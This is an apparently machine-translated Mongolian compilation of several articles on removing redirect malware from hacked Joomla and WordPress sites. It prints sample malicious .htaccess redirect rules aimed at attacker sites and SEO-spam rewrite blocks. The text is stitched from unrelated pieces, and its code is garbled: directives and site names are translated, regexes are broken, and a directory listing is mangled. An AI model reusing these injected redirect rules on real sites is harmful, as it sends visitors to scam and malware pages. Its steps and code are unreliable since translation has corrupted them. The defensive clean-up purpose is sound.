Хортой дахин чиглүүлэлт. WordPress блог дээрх Trojan virus JS:Redirector-MC (гар утасны дахин чиглүүлэлт). Энэ вирус юу хийдэг вэ

Joomla дээр хайлтын дахин чиглүүлэх вирусыг хэрхэн эмчлэх вэ

28.04.2016

Joomla вэб сайтыг удирдахдаа аливаа хакердсаны дараа системийг үе үе халдваргүйжүүлэх шаардлагатай болдог. Хамгийн тааламжгүй зүйлүүдийн нэг бол хайлтын дахин чиглүүлэлтийн вирус гэж нэрлэгддэг бөгөөд энэ нь сайтыг бүрхүүлээр эвдэж, хайлтын дахин чиглүүлэлтүүдийг оруулсны үр дүнд таны сайт хайлтын системд гарч ирэх боловч хэрэглэгчийг порно эсвэл исламын сайт руу чиглүүлдэг. . Үүний үр дүнд шилжилтийн дараа та дараах мессежийг хүлээн авна.

Дараа нь хайлтын систем таны сайт халдвар авсан эсвэл хакердсан болохыг харуулсан ижил төстэй мессежийг гаргаж эхэлнэ. Yandex дээр та байр сууриа алдах болно. Үүний үр дүнд та замын хөдөлгөөнөө алдаж, үйлчлүүлэгчдээ алдах, захиалга өгөхгүй байх болно.

Сэргээх журам.

1. Нөөцлөлт хийж татаж аваарай.
2. Хэрэв хостинг вирусын эсрэг шалгалтгүй бол татаж авсан нөөцлөлтийг вирусны эсрэг програмаар ажиллуулна уу. Бид бүрхүүлийн вирусын файлуудыг олдог, миний хувьд энэ нь PHP.Shell.387 юм. Энэ бол хяналтын системийн аюулгүй байдлын "нүх"-ийг ашигладаг нэг төрлийн вирус юм.

3. Хостинг дээрх вирусын файлуудыг устгана.
4. Админ самбар, FTP-д нууц үгээ солино уу
5. Трояны хайлт нь ямар ч үр дүн өгөхгүй, РНР кодыг хаана суулгасныг гараар хайхад нэлээд удаан хугацаа шаардагдах бөгөөд үргэлж үр дүнтэй байдаггүй тул би нөөц микс хийдэг. Микс гэдэг нь вирусыг нэвтрүүлэхээс өмнө сайтын аливаа файлын нөөцлөлт бөгөөд мэдээллийн сан нь нөөцөөс биш одоогийн хэвээр байх бөгөөд дараа нь бид хавтсыг шинэ нөөцөөс авдаг. зургуудзураг болон хавтастай componentscom_jshoppingfilesimg_productsБүтээгдэхүүний зурагнууд хаана байна?
Үр дүн: бид үр дүндээ сэтгэл хангалуун байна.
P.S. Хэрэв нөөц байхгүй бол яах вэ? эсвэл үүний тулд мэргэжилтнүүдийг татан оролцуулах. Магадгүй байршуулах нөөцлөлт нь туслах болно, гэхдээ энэ нь автоматаар дарж бичигдэх бөгөөд вирус агуулсан тул таныг аврахгүй байх магадлалтай.

Дараагийн урьдчилан сэргийлэх арга хэмжээ:

1. Хуримтлал хэмнэлттэй байх албагүй. Боломжтой бол хяналтын системийг өөрчил.
2. Хостинг заавал өөрчил. Та үүнийг үл тоомсорлож болохгүй. Timeweb дээрх миний туршлагаас харахад ижил Joomla хоёр удаа эвдэрсэн боловч энэ нь асуудлын тал хувь нь юм. Хамгийн гол нь хостинг улиралд нэг удаа серверүүдээ вирус шалгадаггүй байсан. Би өдөр бүр вирусны эсрэг скан хийдэг хостинг ашиглахыг зөвлөж байна, мөн үнэгүй гарын авлагын вирусны эсрэг скан хийх үйлчилгээ бас байдаг. Жишээлбэл, энэ бол reg.ru юм
3. FTP нууц үгийг бүү хадгал.

Сайн уу. Энэхүү богино нийтлэл нь таны WordPress блогийг вирус, троян гэх мэтээс хамгаалахад зориулагдсан болно Гар утасны дахин чиглүүлэлт, ака JS: Redirector-MC .Үүнийг AVAST вирусны эсрэг болон OPERA хөтөч ашиглан илрүүлж болно, бусад антивирусууд хараахан хараагүй байна, би давтан хэлье, тэд хараахан хараагүй байна.

Хэрэв та блог дээрээ энэ вирусыг анзаарсан бол санаа зовох зүйл байхгүй, одоо би танд энэ өвчинтэй хэрхэн тэмцэх талаар зааж өгөх болно. Та Opera хөтчийг ашиглан сайт руу ороход "Троян хаагдсан" цонх, халдвар " JS: Redirector-MC"Энэ бол бидний гар утасны чиглүүлэлт юм.

Бид үүнтэй дараах байдлаар тэмцэх болно.

functions.php файлыг нээгээд хамгийн доод хэсэгт та дараах кодыг олох болно.

Бидний даалгавар бол энэ кодыг арилгах явдал юм.

Та үүнийг хэд хэдэн аргаар хийж болно:

Кодыг гараар устгана уу.
functions.php файлын хуулбарыг олоод хостинг руугаа дахин байршуулна уу

Таныг энэ кодыг устгасны дараа бид тусгай онлайн үйлчилгээг ашиглан блогтоо халдвар байгаа эсэхийг шалгана.

Энэ вирус хаанаас ирсэн талаар танд асуулт байгаа байх. Би Интернэтээр хайгаад намайг тийм ч их баярлуулж чадаагүй хариултыг олсон тул энд дэлгэцийн агшин болгон нийтэлж байна.

Бидний уншсан зүйлээс харахад манай WordPress үйлчилгээ 100% аюулгүй биш гэж дүгнэж болно.

Би энэ вирусыг 2 блог дээр илрүүлсэн, ялангуяа Timeweb хостинг дээр байгаа блогтоо вирус байгаа эсэхийг шалгахыг зөвлөж байна.

Хэрэв вирусыг цаг тухайд нь илрүүлэхгүй бол таны блог хурдан байр сууриа алдаж магадгүй бөгөөд бүтэлгүйтлийн хувь өндөр байх болно, ерөнхийдөө сайн зүйл таныг хүлээж чадахгүй.

Вирусыг устгасны дараа би дараахь зүйлийг зөвлөж байна.

WordPress-ийг шинэчлэх
Ftp нууц үгийг өөрчлөх
Хостинг нууц үгээ өөрчлөх
Компьютерээ вирусын бүрэн сканнерт хийнэ үү

Хэрэв таны блог хакердсан бол би энэ талаар аль хэдийн бичсэн. Хамгийн гол нь үүнийг цаг тухайд нь анзаарч, саармагжуулах явдал юм. Хэрэв ямар нэг зүйл ажиллахгүй эсвэл тодорхойгүй байвал надтай холбогдож тусламж аваарай.

Virusday нь таны вэбсайтаас дахин чиглүүлэх вирусыг устгах боломжийг олгодог. Дахин чиглүүлэлт гэдэг нь хэрэглэгчийг анхны сайт дээрх хуудсуудыг үзэхийг оролдох үед гуравдагч этгээдийн сайт руу дахин чиглүүлэх явдал юм. Ихэвчлэн ийм дахин чиглүүлэлтүүд нь хэрэглэгчдийг хортой эсвэл залилан мэхлэгч программ хангамж тараасан сайт руу чиглүүлдэг (жишээлбэл, вэб хөтчийг шинэчлэх нэрийн дор). Ийм програмыг татаж авах, суулгах нь таны компьютер эсвэл мобайл төхөөрөмжид халдвар авч болзошгүй.

Ихэнх тохиолдолд хортой кодыг таны сайтын үндсэн хэсэгт байрлах .htaccess файлд бичдэг. Хортой код нь ихэвчлэн иймэрхүү харагддаг:
RewriteEngine асаалттай
RewriteCond %(HTTP_REFERER) .*yandex.*
RewriteCond %(HTTP_REFERER) .*google.*
RewriteCond %(HTTP_REFERER) .*bing.*
RewriteRule ^(.*)$ http://maliciouswebsite.net/index.php?t=6

Ийм дахин чиглүүлэх дүрэм Yandex, Google, Bing хайлтын системээс хэрэглэгчдийг maliciouswebsite.net вэб сайт руу дахин чиглүүлэх болно.
Гар утасны дахин чиглүүлэлт нь ихэвчлэн нийтлэг байдаг бөгөөд зөвхөн гар утасны төхөөрөмжөөс таны нөөцөд зочилдог хэрэглэгчдэд нөлөөлдөг.

Вирусын эмчилгээ

Бид хортой дахин чиглүүлэлтүүдийг автоматаар илрүүлж устгах боломжтой Virusday үйлчилгээг ашиглахыг зөвлөж байна. Хэрэв та үүнийг гараар устгахыг хүсвэл дараах зааварчилгаа байна.
1. FTP файлын менежерээр дамжуулан өөрийн сайттай холбогдох
2. Сайтын үндсэн директороос .htaccess файлыг ол
3. Хортой кодыг устгаад файлаа хадгална уу

Дахин чиглүүлэлт арилсан тул та амьсгалахад хялбар байх шиг байна, гэхдээ та үүнийг хэрхэн, хэн таны файлд байрлуулсаныг мэдэхгүй байгаа бөгөөд энэ нь дахин давтагдах эсэхийг мэдэхгүй байгаа ч та тодорхой сэжиглэж байна. болно гэж. Халдагчид таны сайтын файл руу нэвтэрч чадсан эмзэг байдлыг олоход л үлдлээ. Virusday нь халдагчид таны файлуудад бүрэн хандах боломжийг олгодог бүрхүүлүүдийг олж устгаж чадна.

PHP файлууд дахь вирусыг дахин чиглүүлэх

Зөвхөн .htaccess файлд бүртгэгдээд зогсохгүй олон (зуу, мянган файл) PHP файлд амархан бүртгүүлэх боломжтой дахин чиглүүлэлтийн төрлүүд байдаг. Та файл доторх ийм хортой мөрийг ил тод илрүүлэх боломжгүй боловч PHP файлуудын аль нэгийг ажиллуулах үед таны сайт дээрх дахин чиглүүлэлт дахин хийгдэх болно. Дахин чиглүүлэх вирусыг бүрэн устгахын тулд бид Virusday үйлчилгээг ашиглахыг зөвлөж байна. Virusday .htaccess болон *.php файлууд дахь дахин чиглүүлэлтүүдийг илрүүлж устгадаг.

Вирусын шинэ хэлбэрМиний мэдэхгүй гэдгийг харсан хүмүүс байршуулсан сайтуудад ихээхэн нөлөөлдөг найдваргүй серверүүд, данс/дэд дансны хэрэглэгчид бие биенээ "харах" боломжтой. Ялангуяа хостинг дансууд бүгд хавтсанд хийгдсэн байдаг " виртуал хостууд"Бичих ба хууль хэрэглэгчийн хавтаснууд"виртуал домэйн" нь ихэнх тохиолдолд ерөнхий хэрэглэгч ... борлуулагчдад өгдөг. Энэ нь ердийн вэб сервер ашигладаггүй арга юм WHM/CPanel.

Action.htaccess - .htaccess Hack

Вирусфайлуудад нөлөөлдөг .htaccessсайтын хохирогчид. Мөр нэмсэн / Зааварруу зочдыг дахин чиглүүлэх(Yahoo, MSN, Google, facebook, yaindex, Twitter, MySpace гэх мэт ачаалал ихтэй сайт, порталууд дээр үндэслэсэн) зарим сайт руу " вирусны эсрэг. "Энэ хуурамч антивирус, Энэ тухай би өмнөх үгэндээ бичсэн.

Энэ нь иймэрхүү харагдаж байна .htaccessхохирогчид: ( Доорх линкүүдийн агуулгад хандах боломжгүй байна )

ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iidsar/qmiRj7V8NOyJoXpA==&e=3

RewriteEngine асаалттай

RewriteCond%(HTTP_REFERER). * Yandex. *$
RewriteCond%(HTTP_REFERER). * Ангийнхан. *$
RewriteCond%(HTTP_REFERER). * Холбоо барих. *$
RewriteCond%(HTTP_REFERER). * Rambler. *$
RewriteCond%(HTTP_REFERER). * Хоолой. *$
RewriteCond%(HTTP_REFERER). *Википедиа. *$
RewriteCond%(HTTP_REFERER). * Блоггер. *$
RewriteCond%(HTTP_REFERER). * Байду. *$
RewriteCond%(HTTP_REFERER). * Qq.com. *$
RewriteCond%(HTTP_REFERER). * Миний орон зай. *$
RewriteCond%(HTTP_REFERER). *Твиттер. *$
RewriteCond%(HTTP_REFERER). * Фэйсбүүк. *$
RewriteCond%(HTTP_REFERER). *Google. *$
RewriteCond%(HTTP_REFERER). * Амьд. *$
RewriteCond%(HTTP_REFERER). *AOL. *$
RewriteCond%(HTTP_REFERER). * Bing. *$
RewriteCond%(HTTP_REFERER). * Амазон. *$
RewriteCond%(HTTP_REFERER). * Ebay. *$
RewriteCond%(HTTP_REFERER). * LinkedIn. *$
RewriteCond%(HTTP_REFERER). *Flickr. *$
RewriteCond%(HTTP_REFERER). *Жасминыг амьдраарай. *$
RewriteCond%(HTTP_REFERER). * Тийм болохоор. *$
RewriteCond%(HTTP_REFERER). *Хоёр дарж. *$
RewriteCond%(HTTP_REFERER). * Pornhub. *$
RewriteCond%(HTTP_REFERER). *Оркут. *$
RewriteCond%(HTTP_REFERER). * Шууд сэтгүүл. *$
RewriteCond%(HTTP_REFERER). * Wordpress. *$
RewriteCond%(HTTP_REFERER). * Yahoo. *$
RewriteCond%(HTTP_REFERER). *Асуу. *$
RewriteCond%(HTTP_REFERER). * Сэтгэл хөдөлгөх. *$
RewriteCond%(HTTP_REFERER). *Altavista. *$
RewriteCond%(HTTP_REFERER). *MSN. *$
RewriteCond%(HTTP_REFERER). *Netscape. *$
RewriteCond%(HTTP_REFERER). *Хотбот. *$
RewriteCond%(HTTP_REFERER). * Руу явах. *$
RewriteCond%(HTTP_REFERER). * Мэдээлэл хайх. *$
RewriteCond%(HTTP_REFERER). * Ээж. *$
RewriteCond%(HTTP_REFERER). *Бүх вэб. *$
RewriteCond%(HTTP_REFERER). *Ликос. *$
RewriteCond%(HTTP_REFERER). * Хайх. *$
RewriteCond%(HTTP_REFERER). * MetaCrawler. *$
RewriteCond%(HTTP_REFERER). * Шуудан. *$
RewriteCond%(HTTP_REFERER). * Нохой. *$

Дахин бичих дүрэм. *

RewriteCond%() REQUEST_FILENAME!-E
RewriteCond%() REQUEST_FILENAME!-D
RewriteCond%() * REQUEST_FILENAME Jpg $ |!. *. Gif$ | *. PNG$
RewriteCond%(HTTP_USER_AGENT). *Windows*.
Дахин бичих дүрэм. *

WordPress ашигладаг хүмүүс эдгээр мөрүүдийг файлаас олох болно .htaccess-аас нийтийн_html. Үүнээс гадна вирус үүсгэдэг. Htaccess файл нь ижил фолдерт байна WP контент.

*Оронд нь peoriavascularsurgery.com гарч ирэх нөхцөл байдал бас байдаг dns.thesoulfoodcafe.com эсвэл бусад хаягууд.

Энэ вирус юу хийдэг вэ?

Дахин чиглүүлсний дараа зочдыг дараах мессежээр хүлээн авна.

Анхаар!
Компьютер нь вирус, хортой програм байгаа эсэхийг харуулсан янз бүрийн шинж тэмдгүүдийг агуулдаг. Таны вирусээс хамгаалах системийг яаралтай шалгах хэрэгтэй!
Аюулгүй байдлын систем нь таны компьютерийг вирус, хортой программаас хурдан бөгөөд үнэ төлбөргүй сканнердах болно.

Аль товчлуурыг дарахаас үл хамааран бид хуудас руу очно" Миний компьютер"Дуурайж бүтээхийн тулд бүтээсэн XP дизайн. Энэ нь автоматаар "сканнердах" ажлыг эхлүүлж, төгсгөлд нь "халдвар авсан" болохыг олж мэднэ.

OK эсвэл Cancel товчийг дарсны дараа эхлэх болно татаж авахФайлууд setup.exe. Энэ setup.exe нь хуурамч антивирус юмсистемд нөлөөлж байна. Зарим хортой програмыг суулгах нь холбоосууд эвдэрсэнээс илүү тархдаг ба үүнээс гадна эдгээр вирусны эсрэг програм хангамж(бүгд худал) хохирогчийг худалдаж авахыг санал болгож байна.
Вирусын халдвар авсан хүмүүс энэ маягтыг ашиглаж болно. Үүнээс гадна хатуу дискийг бүхэлд нь скан хийхийг зөвлөж байна. Санал болгож байна Kaspersky Internet Securityэсвэл Касперскийн антивирус.

Энэ төрлийн вирус нь OS үйлдлийн системийн зочдод халдварладаг Windows XP, Windows ME, Windows 2000, Windows NT, Windows 98болон Windows 95. Өнөөдрийг хүртэл Windows Vista болон Windows 7 үйлдлийн системд халдвар авсан тохиолдол бүртгэгдээгүй байна.

Энэ вирусыг яаж устгах вэ. Htaccess файлыг серверт оруулах, халдвараас хэрхэн сэргийлэх талаар.

1. Сэжигтэй файлуудын шинжилгээ, кодыг устгах.Зөвхөн файлд хүрэхгүй байгаа эсэхийг шалгахын тулд .htaccessЧи заавал бүх файлд дүн шинжилгээ хийх .phpси . Js.

2. Файлыг дарж бичнэ үү. Htaccess болон суулгана уу CHMOD 644эсвэл 744 зөвхөн бичих эрхтэй хэрэглэгчийн эзэмшигч.

3. Хавтас дотор вэб сайтад байршуулах данс үүсгэх үед / Гэрэсвэл /webrootЭнэ нь ихэвчлэн хэрэглэгчийн нэртэй фолдерыг автоматаар үүсгэх болно ( Cpanel, FTP-ийн хэрэглэгчгэх мэт). Нэг хэрэглэгчээс нөгөөд өгөгдөл бичих, вирус дамжуулахаас сэргийлэхийн тулд хэрэглэгч бүрийн хавтсыг дараах байдлаар тохируулахыг зөвлөж байна.

CHMOD 644 эсвэл 744, 755 - 644-ийг үзүүлэв.
Chaun-R дугаар_хэрэглэгчийн дугаар_хавтас.
CHGRP-R дугаар_хэрэглэгчийн дугаар_хавтас

LS - бүгдээрээтэдгээрийг зөв хийсэн эсэхийг шалгах арга замууд. Иймэрхүү зүйл гарч ирэх ёстой:

Динамик чанга яригчийн динамик drwx-x-x 12 4096 5 сарын 6 14: динамик 51 /
drwx-x-x 10 duran duran 4096 3-р сарын 7 07: 46 дуран /
drwx-x-x 12 хоолой Туршилтын хоолой 4096 1 сарын 29 11:23 Tube /
drwxr-xr-x 14 Экспресс 4096 2009 оны 2-р сарын 26 экспресс /
drwxr-xr-x 9 ezo ezo 4096 5 сарын 19 01: 09 ezo /
drwx-x-x 9 ферм 4096 ферм 19 22: 29 ферм /

Дээрх хэрэглэгчийн аль нэг нь бол FTP Халдвар авсан файлуудТэр хостын өөр хэрэглэгч рүү вирус илгээх боломжгүй. Вэб сервер дээр байршуулсан бүртгэлийг хамгаалах хамгийн бага аюулгүй байдлын арга хэмжээ.

Энэ вируст өртсөн газар нутгийн нийтлэг элементүүд.

Нөлөөлөлд өртсөн бүх газар зочдыг "/" гэсэн домэйн нэртэй сайт руу чиглүүлдэг. main.php? e = 4&h ".

Энэ " вирус. Htaccess"Аливаа CMS-д нөлөөлөх ( Joomla, WordPress, PHPBBгэх мэт) ашиглах .htaccess.

. Htaccess Redirect вирусыг хакердсан &.

Хортой/Вирус - .htaccess "дахин бичих" ба дахин чиглүүлэх

Ямар ч вэбсайт эзэмшигч өөрийн вэбсайтаас траффикийг үл мэдэгдэх сайт руу чиглүүлэхийг хүсдэггүй - энэ нь үйлчлүүлэгчид хоёуланд нь сонирхолтой биш бөгөөд хэрэглэгчийн итгэлийг бууруулж, хайлтын систем болон вирусны эсрэг хориг арга хэмжээ авдаг.

Энэ нийтлэлд би вирусын чиглүүлэлт оруулах үндсэн сонголтуудыг авч үзэх болно.

Анхаар! Дахин чиглүүлэлтийг устгаснаар та нөхцөл байдал дахин давтагдахаас урьдчилан сэргийлэхийн тулд зөвхөн үр дагаврыг устгаж байгаа тул сайт руу вирус нэвтэрч буй шалтгааныг хайх хэрэгтэй!

Нэмж дурдахад, хорлонтой дахин чиглүүлэлт нь сканнер болон вирусны эсрэг програмуудаар тааруухан илэрдэг тул та муугийн эх үүсвэрийг гараар хайх хэрэгтэй болдог.

Юуны өмнө бид файлд код оруулахыг хайж байна .htaccess, ялангуяа сайтын үндэс дээр

холбоотой бүх зүйл Дахин бичихЭнэ нь хаашаа чиглүүлж байгааг шалгах нь зүйтэй.

Доор би хэд хэдэн хортой оруулга өгөх болно - хайлтанд орох хаалга, мянга мянган хуудас үүсгэдэг, Японы спам гэж нэрлэгддэг (SEO спам, иероглиф бүхий хуудсууд - олон нэр байдаг):

RewriteRule ^([^\d\/]+)-(+)-(+)%(.*)+%+%([^\d\/]+)+%(.*)+%+%( [^\d\/]+)+%(.*)+%+%([^\d\/]+)([^\d\/]+)%(.*)+%+%+% (.*)+%+%(.*)F%(.*)+%(.*)+%([^\d\/]+)(+)%(.*)+%+%+% +%(.*)+%(.*)+%([^\d\/]+)+%(.*)+%+%+%(.*)+%+%+%(.*) +%(.*)+%+%(.*)+%([^\d\/]+)(.*)%(.*)+%(.*)+%(.*)(.* )%([^\d\/]+)F%(.*)+%+%([^\d\/]+)+%(.*)+%+%+(+)%(.* )+%+%(.*)(.*)%(.*)+%+%([^\d\/]+)+%(.*)+%+%(.*)([^\ d\/]+)%(.*)+%(.*)+%(.*)(+)%(.*)+%(.*)(.*)%+(.*)%(. *)+%+F%(.*)F%(.*)+%+%([^\d\/]+)(+)%(.*)+%+%(.*)([^ \d\/]+)%+\/.*..*$ ?$65$39=$62&%(QUERY_STRING)[L]

RewriteRule ^(+)\/([^\d\/]+)(+)(.*)+%+%+.*-S.*-.*-F.*-([^\d\/ ]+).*-+..*$ ?$7$1=$3&%(QUERY_STRING)[L]

RewriteRule ^(+)\/([^\d\/]+)(+)(+)+%+([^\d\/]+)+%+(+)+%+([^\d \/]+)+%+(+)+%+([^\d\/]+)+%+(+)+%+([^\d\/]+)(+)%+(+) )+%+%+(+)+%+([^\d\/]+)-.*-+..*$ ?$15$1=$14&%(QUERY_STRING)[L]

Дахин бичих дүрэм ^([^\d\/]+)-(+)-(+)-+.*+..*$ ?$1$3=$2&%(QUERY_STRING)[L]

RewriteRule ^(+)\/([^\d\/]+)(+).*HM+L.*+.*+N.*+YW.*+.*+.*(+)+.* +F.*W+.*+.*F+ZW.*HR.*(.*)--$ ?$2$10=$3&%(QUERY_STRING)[L]

Дахин бичих дүрэм ^(+)\/([^\d\/]+)(+).*+..*$ ?$2$1=$3&%(QUERY_STRING)[L]

Дахин бичих дүрэм ^(+)\/([^\d\/]+)(+).*..*$ ?$2$1=$3&%(QUERY_STRING)[L]

Дахин бичих дүрэм ^(+)\/([^\d\/]+)(+).*(+).*L+N.*YXJ.*HJ.*WF.*+.*Y+.*(.* ).*R.*Y.*V.*+Q.*$ ?$2$1=$4&%(QUERY_STRING)[L]

Дахин бичих дүрэм ^(+)\/([^\d\/]+)(+)\/$ ?$2$1=$3&%(QUERY_STRING)[L]

RewriteRule ^(+)\/([^\d\/]+)(+).*(+).*L+.*+.*+YW.*+.*+.*(+)+-$ ? $2$8=$4&%(QUERY_STRING)[L]

Дахин бичих дүрэм ^(+)\/([^\d\/]+)(+)(.*)%+F%+F.*..*%+F.*-.*-.*-.*% +F&.*=.*$ ?$2$1=$3&%(QUERY_STRING)[L]

Дахин бичих дүрэм ^(+)\/([^\d\/]+)(+).*HM+L.*+.*F+ZW.*WF.*+.*Y+.*(.*).* ZG+.*ZXN+.*WN.*ZH(.*).*$ ?$2$1=$3&%(QUERY_STRING)[L]

RewriteRule ^(+)\/([^\d\/]+)(+)%([^\d\/]+)(.*)%(+)+%+%(+)+%([ ^\d\/]+)([^\d\/]+)%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+ )(+)%(+)+%([^\d\/]+)+%(+)+%+%(+)+%([^\d\/]+)(+)%(+ )+%+([^\d\/]+)%(+)+%([^\d\/]+)+-%(+)+%+%(+)+%([^\d \/]+)+%(+)+%+%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)F%(+ )+%+%(+)+%+([^\d\/]+)$ ?$36$1=$35&%(QUERY_STRING)[L]

Дахин бичих дүрэм ^([^\d\/]+)-(+)-(+)\/+%(+)+%+.*+$ ?$1$3=$4&%(QUERY_STRING)[L]

RewriteRule ^(+)\/([^\d\/]+)(+)(.*)%+F%+F.*..*%+F.*-.*-.*-.*- .*%+F$ ?$2$1=$3&%(QUERY_STRING)[L]

RewriteRule ^(+)\/([^\d\/]+)(+)(.*)%+F%+F.*..*%+F.*-+-.*-.*-. *-.*-.*%+F&.*=.*$ ?$2$1=$3&%(QUERY_STRING)[L]

Дахин бичих дүрэм ^(+)\/([^\d\/]+)(+)_+..*$ ?$2$1=$3&%(QUERY_STRING)[L]

Дахин бичих дүрэм ^([^\d\/]+)-(+)-(+)\/.*-.*-+-.*\/$ ?$1$3=$2&%(QUERY_STRING)[L]

Дахин бичих дүрэм ^([^\d\/]+)-(+)-(+)\/+.*\/$ ?$1$3=$2&%(QUERY_STRING)[L]

Дахин бичих дүрэм ^(+)\/([^\d\/]+)(+)(.*)+%+%+-.*+..*$ ?$2$1=$3&%(QUERY_STRING)[L]

RewriteRule ^(+)\/([^\d\/]+)(+)-.*-V.*%+(.*)+%+%+.*-S.*+..*$ ? $2$1=$3&%(QUERY_STRING)[L]

Дахин бичих дүрэм ^([^\d\/]+)-(+)-(+)\/.*-.*-+\/$ ?$1$3=$2&%(QUERY_STRING)[L]

Дахин бичих дүрэм ^(+)\/([^\d\/]+)(+)-+..*$ ?$2$1=$3&%(QUERY_STRING)[L]

RewriteRule ^(+)\/([^\d\/]+)(+)..*&.*=.*\:\/.*-+..*\/.*-.*-.* -.*-.*-.*\/&.*=+K([^\d\/]+)&.*=%(+)+%(.*)+%(+)+%([ ^\d\/]+)(.*)%(+)+%+%(+)+%([^\d\/]+)(.*)+%(+)+%([^\ d\/]+)+%(+)+%([^\d\/]+)(+)%(+)+%+%(+)+%([^\d\/]+)+ %(+)+%+%(+)+%+(+)%(+)+%([^\d\/]+)+%(+)+%+%(+)+%([^ \d\/]+)++%(+)+%++%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+) +%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+ )(+)%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(+)%(+)+%([^\ d\/]+)++%(+)+%([^\d\/]+)++%(+)+%([^\d\/]+)F%(+)+%( [^\d\/]+)(.*)%(+)+%([^\d\/]+)+%(+)+%+%(+)+%+%(+)+% ([^\d\/]+)(.*)%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(+) %(+)+%([^\d\/]+)+&.*=+&.*=+&.*=+&.*=.*\:\/.*+..*.. *..*\/.*\?.*=OIP.(.*).*U.*+.*(+).*U.*+.*+V+.*Q(.*).*( +).*&.*=+.+&.*=+&.*=+&.*=+&.*=+&.*=+&.*=%(+)+%(.*) +%(+)+%([^\d\/]+)(.*)%(+)+%+%(+)+%([^\d\/]+)(.*)+% (+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(+)%(+)+%+%(+)+%([ ^\d\/]+)+%(+)+%+%(+)+%+(+)%(+)+%([^\d\/]+)+%(+)+%+ %(+)+%([^\d\/]+)++%(+)+%++%(+)+%([^\d\/]+)+%(+)+%( [^\d\/]+)+%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)+%(+)+% ([^\d\/]+)(+)%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(+)% (+)+%([^\d\/]+)++%(+)+%([^\d\/]+)++%(+)+%([^\d\/]+ )F%(+)+%([^\d\/]+)(.*)%(+)+%([^\d\/]+)+%(+)+%+%(+) +%+%(+)+%([^\d\/]+)(.*)%(+)+%([^\d\/]+)+%(+)+%([^\ d\/]+)(+)%(+)+%([^\d\/]+)+&.*=+.*+.*&.*=+.*+.*&.*= +.*+.*&.*=+.*+.*+.*&.*=+.*+.*+.*$ ?$148$146=$147&%(QUERY_STRING)[L]

RewriteRule ^(+)\/([^\d\/]+)(+)%([^\d\/]+)+%(+)+%([^\d\/]+)+% (+)+%([^\d\/]+)+%(+)+%+%(+)+%+([^\d\/]+)&.*=+&.*=+ $ ?$11$1=$10&%(QUERY_STRING)[L]

RewriteRule ^(+)\/([^\d\/]+)(+)%.*%.*+%+%.*+%.*%.*+%.*+%.*+%. *%.*+%.*+%.*+%+%.*+%.*%.*+%+.*%.*+%.*+-%.*+%+%.*+%. .*+%.*+%+%.*+%.*+%.*+%.*%.*+%+%.*+%+.*\/$ ?$2$1=$3&%(QUERY_STRING )[L]

RewriteRule ^(+)\/([^\d\/]+)(+)%.*%.*+%.*%.*+%.*+%.*+%.*%.*+% +.*\/$ ?$2$1=$3&%(QUERY_STRING)[L]

Дахин бичих дүрэм ^([^\d\/]+)-(+)-(+)$ ?$1$3=$2&%(QUERY_STRING)[L]

Дахин бичих дүрэм ^(+)\/([^\d\/]+)(+)\/.*-.*\/+\/.*$ ?$2$1=$3&%(QUERY_STRING)[L]

Дахин бичих дүрэм ^([^\d\/]+)-(+)-(+)\/+%(+)+%+.*+\/$ ?$1$3=$4&%(QUERY_STRING)[L]

RewriteRule ^(+)\/([^\d\/]+)(+)%([^\d\/]+)F%(+)+%+%(+)+%([^\d \/]+)+%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(+)%(+)+%([ ^\d\/]+)(.*)%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(.*)% (+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(.*)%(+)+%([^\d\/] +)+%(+)+%([^\d\/]+)(+)%(+)+%([^\d\/]+)+%(+)+%([^\d \/]+)+%+%(+)+%([^\d\/]+)(+)%(+)+%([^\d\/]+)+%(+)+% +%(+)+%([^\d\/]+)+%(+)+%+%(+)+%([^\d\/]+)(.*)%(+)+ %([^\d\/]+)(+)&.*=-+&.*=-+$ ?$49$38=$50&%(QUERY_STRING)[L]

Дахин бичих дүрэм ^([^\d\/]+)-(+)-(+)\/.*-.*-.*-.*\/$ ?$1$3=$2&%(QUERY_STRING)[L]

Дахин бичих дүрэм ^([^\d\/]+)-(+)-(+)\/.*+\/$ ?$1$3=$2&%(QUERY_STRING)[L]

RewriteRule ^(+)\/([^\d\/]+)(+)%([^\d\/]+)F%(+)+%+%(+)+%([^\d \/]+)+%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(+)%(+)+%([ ^\d\/]+)(.*)%(+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(.*)% (+)+%([^\d\/]+)+%(+)+%([^\d\/]+)(.*)%(+)+%([^\d\/] +)+%(+)+%([^\d\/]+)(+)%(+)+%([^\d\/]+)+%(+)+%([^\d \/]+)++%(+)+%([^\d\/]+)(+)%(+)+%([^\d\/]+)+%(+)+%+ %(+)+%([^\d\/]+)+%(+)+%+%(+)+%([^\d\/]+)(.*)%(+)+% ([^\d\/]+)(+)&.*=-+&.*=-+$ ?$49$38=$50&%(QUERY_STRING)[L]

Дахин бичих дүрэм ^([^\d\/]+)-(+)-(+)\/+.*+\/$ ?$1$3=$2&%(QUERY_STRING)[L]

Дахин бичих дүрэм ^(+)\/([^\d\/]+)(+)..*$ ?$2$1=$3&%(QUERY_STRING)[L]

Дахин бичих дүрэм ^([^\d\/]+)-(+)-(+)\/.*\/$ ?$1$3=$2&%(QUERY_STRING)[L]

RewriteRule ^(+)\/([^\d\/]+)(+)%.*%.*+%+%.*+%.*%.*+%.*+%.*+%. *%.*+%.*+%.*+%+%.*+%.*%.*+%+.*%.*+%.*+-%.*+%+%.*+%. .*+%.*+%+%.*+%.*+%.*+%.*%.*+%+%.*+%+.*\/.*\/+\/$ ?$2 $1=$3&%(QUERY_STRING)[L]

